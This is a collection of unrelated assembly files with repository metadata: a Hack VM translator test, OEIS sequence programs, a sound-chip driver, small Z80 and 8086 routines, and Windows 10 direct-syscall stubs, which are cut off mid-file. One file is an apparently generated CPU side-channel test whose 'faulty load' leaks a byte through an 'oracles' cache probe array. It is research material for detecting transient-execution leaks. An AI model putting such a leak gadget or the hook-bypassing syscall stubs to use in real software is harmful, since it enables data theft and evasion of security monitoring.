@SP
M=M+1
// eq
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL3
D;JEQ
@SP
A=M
M=0
@LABEL4
0;JMP
(LABEL3)
@SP
A=M
M=-1
(LABEL4)
@SP
M=M+1
// push constant 16
@16
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 17
@17
D=A
@SP
A=M
M=D
@SP
M=M+1
// eq
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL5
D;JEQ
@SP
A=M
M=0
@LABEL6
0;JMP
(LABEL5)
@SP
A=M
M=-1
(LABEL6)
@SP
M=M+1
// push constant 892
@892
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 891
@891
D=A
@SP
A=M
M=D
@SP
M=M+1
// lt
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL7
D;JLT
@SP
A=M
M=0
@LABEL8
0;JMP
(LABEL7)
@SP
A=M
M=-1
(LABEL8)
@SP
M=M+1
// push constant 891
@891
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 892
@892
D=A
@SP
A=M
M=D
@SP
M=M+1
// lt
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL9
D;JLT
@SP
A=M
M=0
@LABEL10
0;JMP
(LABEL9)
@SP
A=M
M=-1
(LABEL10)
@SP
M=M+1
// push constant 891
@891
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 891
@891
D=A
@SP
A=M
M=D
@SP
M=M+1
// lt
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL11
D;JLT
@SP
A=M
M=0
@LABEL12
0;JMP
(LABEL11)
@SP
A=M
M=-1
(LABEL12)
@SP
M=M+1
// push constant 32767
@32767
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 32766
@32766
D=A
@SP
A=M
M=D
@SP
M=M+1
// gt
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL13
D;JGT
@SP
A=M
M=0
@LABEL14
0;JMP
(LABEL13)
@SP
A=M
M=-1
(LABEL14)
@SP
M=M+1
// push constant 32766
@32766
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 32767
@32767
D=A
@SP
A=M
M=D
@SP
M=M+1
// gt
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL15
D;JGT
@SP
A=M
M=0
@LABEL16
0;JMP
(LABEL15)
@SP
A=M
M=-1
(LABEL16)
@SP
M=M+1
// push constant 32766
@32766
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 32766
@32766
D=A
@SP
A=M
M=D
@SP
M=M+1
// gt
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@LABEL17
D;JGT
@SP
A=M
M=0
@LABEL18
0;JMP
(LABEL17)
@SP
A=M
M=-1
(LABEL18)
@SP
M=M+1
// push constant 57
@57
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 31
@31
D=A
@SP
A=M
M=D
@SP
M=M+1
// push constant 53
@53
D=A
@SP
A=M
M=D
@SP
M=M+1
// add
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=D+A
@SP
A=M
M=D
@SP
M=M+1
// push constant 112
@112
D=A
@SP
A=M
M=D
@SP
M=M+1
// sub
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=A-D
@SP
A=M
M=D
@SP
M=M+1
// neg
@SP
M=M-1
@SP
A=M
D=M
D=-D
@SP
A=M
M=D
@SP
M=M+1
// and
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=D&A
@SP
A=M
M=D
@SP
M=M+1
// push constant 82
@82
D=A
@SP
A=M
M=D
@SP
M=M+1
// or
@SP
M=M-1
@SP
A=M
D=M
@SP
M=M-1
@SP
A=M
A=M
D=D|A
@SP
A=M
M=D
@SP
M=M+1
// not
@SP
M=M-1
@SP
A=M
D=M
D=!D
@SP
A=M
M=D
@SP
M=M+1
|
||||
TheStack | 50dc8a5e1dbea4f43b936b9a6ac9f64e052f09a0 | Assemblycode:Assembly | {"size": 446, "ext": "asm", "max_stars_repo_path": "programs/oeis/036/A036216.asm", "max_stars_repo_name": "jmorken/loda", "max_stars_repo_stars_event_min_datetime": "2021-03-15T11:38:20.000Z", "max_stars_repo_stars_event_max_datetime": "2021-03-15T11:38:20.000Z", "max_issues_repo_path": "programs/oeis/036/A036216.asm", "max_issues_repo_name": "jmorken/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/036/A036216.asm", "max_forks_repo_name": "jmorken/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 29.7333333333, "max_line_length": 259, "alphanum_fraction": 0.7668161435} | ; A036216: Expansion of 1/(1 - 3*x)^4; 4-fold convolution of A000244 (powers of 3).
; 1,12,90,540,2835,13608,61236,262440,1082565,4330260,16888014,64481508,241805655,892820880,3252418920,11708708112,41712272649,147219785820,515269250370,1789882659180,6175095174171,21171754882872,72176437100700,244772264950200,826106394206925,2775717484535268
add $0,3
mov $3,3
pow $3,$0
bin $0,3
mov $2,$3
lpb $2
mul $0,$2
mod $2,5
lpe
mov $1,$0
div $1,27
|
||||
TheStack | bceb142d2a78d9b8ca2e1fb1220b6c1d00efa85f | Assemblycode:Assembly | {"size": 7097, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xca.log_21829_1227.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xca.log_21829_1227.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xca.log_21829_1227.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 37.1570680628, "max_line_length": 2999, "alphanum_fraction": 0.6508383824} | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r14
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x1e018, %rsi
lea addresses_WC_ht+0x1949, %rdi
nop
nop
nop
nop
nop
xor %r12, %r12
mov $39, %rcx
rep movsb
nop
nop
add %rdx, %rdx
lea addresses_WC_ht+0xe4d9, %rdi
nop
nop
add $58716, %rcx
movups (%rdi), %xmm5
vpextrq $1, %xmm5, %rsi
nop
xor %rcx, %rcx
lea addresses_WC_ht+0x65d9, %r14
nop
add %r12, %r12
vmovups (%r14), %ymm1
vextracti128 $0, %ymm1, %xmm1
vpextrq $0, %xmm1, %rdi
nop
and %rdx, %rdx
lea addresses_WC_ht+0x17ad, %r14
nop
nop
nop
nop
nop
sub $35482, %rbp
movups (%r14), %xmm2
vpextrq $0, %xmm2, %r12
nop
nop
add $11466, %rsi
lea addresses_WC_ht+0xd9, %rdx
xor %rbp, %rbp
mov (%rdx), %r14
and %rcx, %rcx
lea addresses_UC_ht+0x1a2d9, %rcx
nop
nop
nop
nop
nop
sub %rdi, %rdi
vmovups (%rcx), %ymm2
vextracti128 $0, %ymm2, %xmm2
vpextrq $1, %xmm2, %rsi
nop
xor %r12, %r12
lea addresses_WT_ht+0x14234, %rbp
and %rdi, %rdi
movb $0x61, (%rbp)
nop
nop
nop
nop
nop
dec %rcx
lea addresses_normal_ht+0x13cf9, %r14
cmp $31086, %rdi
mov $0x6162636465666768, %rcx
movq %rcx, %xmm0
and $0xffffffffffffffc0, %r14
movaps %xmm0, (%r14)
nop
cmp $24440, %rdx
lea addresses_D_ht+0xf499, %rcx
nop
nop
nop
nop
nop
and $41595, %rsi
movups (%rcx), %xmm2
vpextrq $1, %xmm2, %rdi
nop
nop
sub %rcx, %rcx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %r14
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %r15
push %r8
push %rax
push %rbp
push %rsi
// Load
lea addresses_US+0x15519, %rbp
nop
inc %rax
movb (%rbp), %r12b
nop
add %r12, %r12
// Store
mov $0x2d9, %r14
sub $39771, %r15
mov $0x5152535455565758, %rbp
movq %rbp, %xmm2
vmovups %ymm2, (%r14)
sub $59803, %r15
// Store
mov $0x1f9, %r8
inc %rax
movw $0x5152, (%r8)
dec %r12
// Store
mov $0x66e78c00000000d9, %r8
nop
nop
nop
and $27617, %r12
movl $0x51525354, (%r8)
nop
nop
nop
add $22474, %r15
// Faulty Load
lea addresses_UC+0x1ad9, %r14
nop
nop
add %rbp, %rbp
mov (%r14), %r15
lea oracles, %r14
and $0xff, %r15
shlq $12, %r15
mov (%r14,%r15,1), %r15
pop %rsi
pop %rbp
pop %rax
pop %r8
pop %r15
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_UC', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_US', 'same': False, 'AVXalign': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'size': 32, 'NT': False, 'type': 'addresses_P', 'same': False, 'AVXalign': False, 'congruent': 11}}
{'OP': 'STOR', 'dst': {'size': 2, 'NT': True, 'type': 'addresses_P', 'same': False, 'AVXalign': False, 'congruent': 5}}
{'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_NC', 'same': False, 'AVXalign': False, 'congruent': 9}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_UC', 'same': True, 'AVXalign': True, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_UC_ht', 'congruent': 0}, 'dst': {'same': False, 'type': 'addresses_WC_ht', 'congruent': 4}}
{'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'LOAD', 'src': {'size': 32, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 7}}
{'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 1}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'LOAD', 'src': {'size': 32, 'NT': False, 'type': 'addresses_UC_ht', 'same': True, 'AVXalign': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'size': 1, 'NT': False, 'type': 'addresses_WT_ht', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_normal_ht', 'same': False, 'AVXalign': True, 'congruent': 5}}
{'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
||||
TheStack | 99949e61c6cdd996242534f08b1fd96665b36518 | Assemblycode:Assembly | {"size": 1841, "ext": "asm", "max_stars_repo_path": "src/drivers/PSG.asm", "max_stars_repo_name": "sharksym/vgmplay-sharksym", "max_stars_repo_stars_event_min_datetime": "2020-04-21T17:26:27.000Z", "max_stars_repo_stars_event_max_datetime": "2021-09-25T18:41:01.000Z", "max_issues_repo_path": "src/drivers/PSG.asm", "max_issues_repo_name": "sharksym/vgmplay-sharksym", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "src/drivers/PSG.asm", "max_forks_repo_name": "sharksym/vgmplay-sharksym", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 6, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 13.4379562044, "max_line_length": 53, "alphanum_fraction": 0.7050516024} | ;
; AY-3-8910 PSG / YM2149 SSG driver
;
PSG_BASE_PORT: equ 0A0H
PSG_ADDRESS: equ 00H
PSG_WRITE: equ 01H
PSG_READ: equ 02H
PSG_CLOCK: equ 1789773
PSG: MACRO ?base, ?name = PSG_name
super: Driver ?name, PSG_CLOCK, Driver_PrintInfoImpl
; e = register
; d = value
SafeWriteRegister:
ld a,e
cp 14
ret nc
cp 7
jr z,MaskMixer
; a = register
; d = value
WriteRegister:
di
out (?base + PSG_ADDRESS),a
ld a,d
ei
out (?base + PSG_WRITE),a
ret
MaskMixer:
ld a,d
and 3FH
or 80H
ld d,a
ld a,e
jr WriteRegister
; a = register
; a <- value
ReadRegister:
di
out (?base + PSG_ADDRESS),a
ei
in a,(?base + PSG_READ)
ret
ENDM
; ix = this
; iy = drivers
PSG_Construct:
call Driver_Construct
call PSG_Detect
jp nc,Driver_NotFound
jr PSG_Reset
; ix = this
PSG_Destruct:
call Driver_IsFound
ret nc
jr PSG_Reset
; e = register
; d = value
; ix = this
PSG_WriteRegister:
ld a,e
ld bc,PSG.WriteRegister
jp Utils_JumpIXOffsetBC
; a = register
; a = value
; ix = this
PSG_ReadRegister:
ld bc,PSG.ReadRegister
jp Utils_JumpIXOffsetBC
; e = register
; d = value
; ix = this
PSG_SafeWriteRegister:
ld bc,PSG.SafeWriteRegister
jp Utils_JumpIXOffsetBC
; b = count
; e = register
; d = value
; ix = this
PSG_FillRegisters:
push bc
push de
call PSG_SafeWriteRegister
pop de
pop bc
inc e
djnz PSG_FillRegisters
ret
; ix = this
PSG_Reset:
ld b,3
ld de,0008H
call PSG_FillRegisters
ld b,14
ld de,0000H
jr PSG_FillRegisters
; ix = this
; f <- c: found
PSG_Detect:
ld de,1200H
call PSG_WriteRegister
ld de,3402H
call PSG_WriteRegister
ld a,0
call PSG_ReadRegister
xor 12H
ret nz
ld a,2
call PSG_ReadRegister
xor 34H
ret nz
scf
ret
;
SECTION RAM
PSG_instance: PSG PSG_BASE_PORT
ENDS
PSG_interface:
InterfaceOffset PSG.SafeWriteRegister
PSG_name:
db "Internal PSG",0
|
||||
TheStack | 7c3a528beb0022cc45df5e42cd8cab77aaac2f69 | Assemblycode:Assembly | {"size": 379, "ext": "asm", "max_stars_repo_path": "libsrc/stdio_new/general/stdio_statesave.asm", "max_stars_repo_name": "andydansby/z88dk-mk2", "max_stars_repo_stars_event_min_datetime": "2020-09-15T08:35:49.000Z", "max_stars_repo_stars_event_max_datetime": "2020-09-15T08:35:49.000Z", "max_issues_repo_path": "libsrc/stdio_new/general/stdio_statesave.asm", "max_issues_repo_name": "andydansby/z88dk-MK2", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "libsrc/stdio_new/general/stdio_statesave.asm", "max_forks_repo_name": "andydansby/z88dk-MK2", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 11.4848484848, "max_line_length": 52, "alphanum_fraction": 0.580474934} | ; stdio_statesave
; 08.2009 aralbrec
XLIB stdio_statesave
; pushes all registers to stack
; companion to stdio_staterestore
; uses : hl
.stdio_statesave
ex (sp),hl ; hl = return address
push af
push bc
push de
ex af,af
exx
push af
push bc
push de
push hl
push ix
push iy
ex af,af
exx
jp (hl)
|
||||
TheStack | 44fc887ec174055f97b3ddd7410dfb6bfa25286a | Assemblycode:Assembly | {"size": 355, "ext": "asm", "max_stars_repo_path": "exmpl_6point2.asm", "max_stars_repo_name": "selectiveduplicate/8086-assembly", "max_stars_repo_stars_event_min_datetime": "2020-04-11T00:32:34.000Z", "max_stars_repo_stars_event_max_datetime": "2022-02-05T16:23:25.000Z", "max_issues_repo_path": "exmpl_6point2.asm", "max_issues_repo_name": "selectiveduplicate/8086-assembly", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "exmpl_6point2.asm", "max_forks_repo_name": "selectiveduplicate/8086-assembly", "max_forks_repo_forks_event_min_datetime": "2018-04-16T13:46:18.000Z", "max_forks_repo_forks_event_max_datetime": "2021-05-07T06:51:31.000Z"} | {"max_stars_count": 2, "max_issues_count": null, "max_forks_count": 3, "avg_line_length": 16.1363636364, "max_line_length": 69, "alphanum_fraction": 0.5943661972} |
; You may customize this and other start-up templates;
; The location of this template is c:\emu8086\inc\0_com_template.txt
org 100h
MOV AX, 0AH
CMP AX, 0 ; check if AX < 0
JNL NOTHING ; if not, then simply don't do anything
NEG AX ;if less than zero, then change sign
NOTHING:
ret
|
||||
TheStack | 9682e8fdb3c661971e79b4fba3532f3052588b65 | Assemblycode:Assembly | {"size": 990, "ext": "asm", "max_stars_repo_path": "programs/oeis/004/A004776.asm", "max_stars_repo_name": "jmorken/loda", "max_stars_repo_stars_event_min_datetime": "2021-03-15T11:38:20.000Z", "max_stars_repo_stars_event_max_datetime": "2021-03-15T11:38:20.000Z", "max_issues_repo_path": "programs/oeis/004/A004776.asm", "max_issues_repo_name": "jmorken/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/004/A004776.asm", "max_forks_repo_name": "jmorken/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 123.75, "max_line_length": 904, "alphanum_fraction": 0.7131313131} | ; A004776: Numbers not congruent to 5 (mod 8).
; 0,1,2,3,4,6,7,8,9,10,11,12,14,15,16,17,18,19,20,22,23,24,25,26,27,28,30,31,32,33,34,35,36,38,39,40,41,42,43,44,46,47,48,49,50,51,52,54,55,56,57,58,59,60,62,63,64,65,66,67,68,70,71,72,73,74,75,76,78,79,80,81,82,83,84,86,87,88,89,90,91,92,94,95,96,97,98,99,100,102,103,104,105,106,107,108,110,111,112,113,114,115,116,118,119,120,121,122,123,124,126,127,128,129,130,131,132,134,135,136,137,138,139,140,142,143,144,145,146,147,148,150,151,152,153,154,155,156,158,159,160,161,162,163,164,166,167,168,169,170,171,172,174,175,176,177,178,179,180,182,183,184,185,186,187,188,190,191,192,193,194,195,196,198,199,200,201,202,203,204,206,207,208,209,210,211,212,214,215,216,217,218,219,220,222,223,224,225,226,227,228,230,231,232,233,234,235,236,238,239,240,241,242,243,244,246,247,248,249,250,251,252,254,255,256,257,258,259,260,262,263,264,265,266,267,268,270,271,272,273,274,275,276,278,279,280,281,282,283,284
mul $0,8
mov $1,$0
add $1,2
div $1,7
|
||||
TheStack | be68d3911a0ad34f1c390a8fa55ab68e98e91c80 | Assemblycode:Assembly | {"size": 543, "ext": "asm", "max_stars_repo_path": "oeis/033/A033581.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/033/A033581.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/033/A033581.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 90.5, "max_line_length": 498, "alphanum_fraction": 0.7845303867} | ; A033581: a(n) = 6*n^2.
; 0,6,24,54,96,150,216,294,384,486,600,726,864,1014,1176,1350,1536,1734,1944,2166,2400,2646,2904,3174,3456,3750,4056,4374,4704,5046,5400,5766,6144,6534,6936,7350,7776,8214,8664,9126,9600,10086,10584,11094,11616,12150,12696,13254,13824,14406,15000,15606,16224,16854,17496,18150,18816,19494,20184,20886,21600,22326,23064,23814,24576,25350,26136,26934,27744,28566,29400,30246,31104,31974,32856,33750,34656,35574,36504,37446,38400,39366,40344,41334,42336,43350,44376,45414,46464,47526,48600,49686,50784
pow $0,2
mul $0,6
|
||||
TheStack | 86db230d9d8c913f18290dd84a7f4ec093b9f333 | Assemblycode:Assembly | {"size": 145667, "ext": "asm", "max_stars_repo_path": "project/ntstub/amd64/10_0_14393_sp0_ssdt_sysenter.asm", "max_stars_repo_name": "mehrdad-shokri/windows-syscall-table", "max_stars_repo_stars_event_min_datetime": "2017-06-05T06:58:29.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-31T08:26:53.000Z", "max_issues_repo_path": "project/ntstub/amd64/10_0_14393_sp0_ssdt_sysenter.asm", "max_issues_repo_name": "mehrdad-shokri/windows-syscall-table", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "project/ntstub/amd64/10_0_14393_sp0_ssdt_sysenter.asm", "max_forks_repo_name": "mehrdad-shokri/windows-syscall-table", "max_forks_repo_forks_event_min_datetime": "2017-06-05T08:34:18.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-11T06:15:58.000Z"} | {"max_stars_count": 372, "max_issues_count": null, "max_forks_count": 105, "avg_line_length": 23.0704783022, "max_line_length": 362, "alphanum_fraction": 0.7762705349} | ; DO NOT MODIFY THIS FILE DIRECTLY!
; author: @TinySecEx
; ssdt asm stub for 10.0.14393-sp0-windows-10-rs1-1607 amd64
option casemap:none
option prologue:none
option epilogue:none
.code
; ULONG64 __stdcall NtAccessCheck( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheck PROC STDCALL
mov r10 , rcx
mov eax , 0
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAccessCheck ENDP
; ULONG64 __stdcall NtWorkerFactoryWorkerReady( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWorkerFactoryWorkerReady PROC STDCALL
mov r10 , rcx
mov eax , 1
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWorkerFactoryWorkerReady ENDP
; ULONG64 __stdcall NtAcceptConnectPort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtAcceptConnectPort PROC STDCALL
mov r10 , rcx
mov eax , 2
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtAcceptConnectPort ENDP
; ULONG64 __stdcall NtMapUserPhysicalPagesScatter( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtMapUserPhysicalPagesScatter PROC STDCALL
mov r10 , rcx
mov eax , 3
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtMapUserPhysicalPagesScatter ENDP
; ULONG64 __stdcall NtWaitForSingleObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForSingleObject PROC STDCALL
mov r10 , rcx
mov eax , 4
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtWaitForSingleObject ENDP
; ULONG64 __stdcall NtCallbackReturn( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCallbackReturn PROC STDCALL
mov r10 , rcx
mov eax , 5
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCallbackReturn ENDP
; ULONG64 __stdcall NtReadFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtReadFile PROC STDCALL
mov r10 , rcx
mov eax , 6
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtReadFile ENDP
; ULONG64 __stdcall NtDeviceIoControlFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeviceIoControlFile PROC STDCALL
mov r10 , rcx
mov eax , 7
;syscall
db 0Fh , 05h
ret
